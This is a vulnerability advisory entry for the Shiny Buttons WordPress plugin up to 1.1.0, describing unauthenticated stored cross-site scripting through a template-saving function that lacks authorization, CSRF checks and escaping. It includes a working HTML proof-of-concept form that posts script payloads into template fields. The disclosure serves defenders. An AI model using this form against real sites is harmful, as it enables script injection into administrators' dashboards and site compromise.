WordPress Plugin Vulnerabilities
Shiny Buttons <= 1.1.0 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not have any authorisation and CSRF in place when saving a template (wpbtn_save_template function hooked to the init action), nor sanitise and escape them before outputting them in the admin dashboard, which allow unauthenticated users to add a malicious template and lead to Stored Cross-Site Scripting issues.
Proof of Concept
<html> <body> <form action="https://example.com/" method="POST"> <input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" /> <input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" /> <input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" /> <input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" /> <input type="hidden" name="wpbtn_tpl[font]" value="Michroma" /> <input type="hidden" name="wpbtn_tpl[font_size]" value="12" /> <input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" /> <input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" /> <input type="hidden" name="wpbtn_tpl[radius]" value="0" /> <input type="hidden" name="wpbtn_tpl[width]" value="0" /> <input type="hidden" name="do" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vishal Mohan
Submitter
Vishal Mohan
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)